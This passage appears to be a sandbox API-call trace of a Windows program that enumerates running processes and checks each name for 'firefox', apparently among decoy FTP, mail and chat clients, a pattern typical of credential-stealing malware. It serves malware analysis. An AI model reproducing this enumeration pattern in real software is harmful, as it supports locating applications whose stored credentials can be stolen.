CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0094.980] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356abf0 [0094.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356abf0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0094.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0094.980] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="firefox") returned 0x0 [0094.980] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0094.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.981] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a998 [0094.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356a998, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0094.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0094.982] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="firefox") returned 0x0 [0094.982] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0094.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.983] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571a08 [0094.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3571a08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0094.983] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0094.983] StrStrIA (lpFirst="powell_jane.exe", lpSrch="firefox") returned 0x0 [0094.983] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0094.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.984] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356ce08 [0094.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x356ce08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0094.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0094.984] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="firefox") returned 0x0 [0094.985] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0094.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.986] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3571798 [0094.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3571798, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0094.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0094.986] StrStrIA (lpFirst="gainedshape.exe", lpSrch="firefox") returned 0x0 [0094.986] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0095.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.007] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356ce88 [0095.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x356ce88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0095.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0095.007] StrStrIA (lpFirst="opens-versions.exe", lpSrch="firefox") returned 0x0 [0095.007] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0095.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0095.008] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356a9c0 [0095.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356a9c0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0095.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0095.008] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="firefox") returned 0x0 [0095.008] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0095.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.009] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35718b8 [0095.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x35718b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0095.010] StrStrIA (lpFirst="3dftp.exe", lpSrch="firefox") returned 0x0 [0095.010] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.011] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cea8 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x356cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0095.011] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0095.011] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="firefox") returned 0x0 [0095.011] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0095.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.012] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35718d0 [0095.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x35718d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0095.012] StrStrIA (lpFirst="alftp.exe", lpSrch="firefox") returned 0x0 [0095.012] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0095.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.013] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571828 [0095.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3571828, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0095.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0095.014] StrStrIA (lpFirst="barca.exe", lpSrch="firefox") returned 0x0 [0095.014] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0095.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.015] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35717b0 [0095.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35717b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0095.016] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0095.016] StrStrIA (lpFirst="bitkinex.exe", lpSrch="firefox") returned 0x0 [0095.016] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0095.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.018] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35717c8 [0095.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x35717c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0095.018] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0095.018] StrStrIA (lpFirst="coreftp.exe", lpSrch="firefox") returned 0x0 [0095.018] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0095.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.020] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547958 [0095.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547958, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0095.020] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0095.020] StrStrIA (lpFirst="far.exe", lpSrch="firefox") returned 0x0 [0095.020] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0095.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.021] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571888 [0095.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3571888, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0095.021] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0095.021] StrStrIA (lpFirst="filezilla.exe", lpSrch="firefox") returned 0x0 [0095.021] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0095.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.022] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571978 [0095.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3571978, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.023] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0095.023] StrStrIA (lpFirst="flashfxp.exe", lpSrch="firefox") returned 0x0 [0095.023] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0095.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.024] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35718a0 [0095.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x35718a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0095.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0095.024] StrStrIA (lpFirst="fling.exe", lpSrch="firefox") returned 0x0 [0095.024] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0095.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0095.025] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x356cec8 [0095.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x356cec8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0095.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0095.026] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="firefox") returned 0x0 [0095.026] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0095.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.027] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356cee8 [0095.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x356cee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0095.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0095.027] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="firefox") returned 0x0 [0095.027] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0095.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0095.028] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547988 [0095.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3547988, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0095.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0095.028] StrStrIA (lpFirst="icq.exe", lpSrch="firefox") returned 0x0 [0095.028] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0095.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.029] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35718e8 [0095.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x35718e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0095.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0095.029] StrStrIA (lpFirst="leechftp.exe", lpSrch="firefox") returned 0x0 [0095.029] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0095.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.031] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571930 [0095.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3571930, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0095.031] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0095.031] StrStrIA (lpFirst="ncftp.exe", lpSrch="firefox") returned 0x0 [0095.031] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0095.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.032] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3572600 [0095.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3572600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0095.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0095.032] StrStrIA (lpFirst="notepad.exe", lpSrch="firefox") returned 0x0 [0095.032] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, 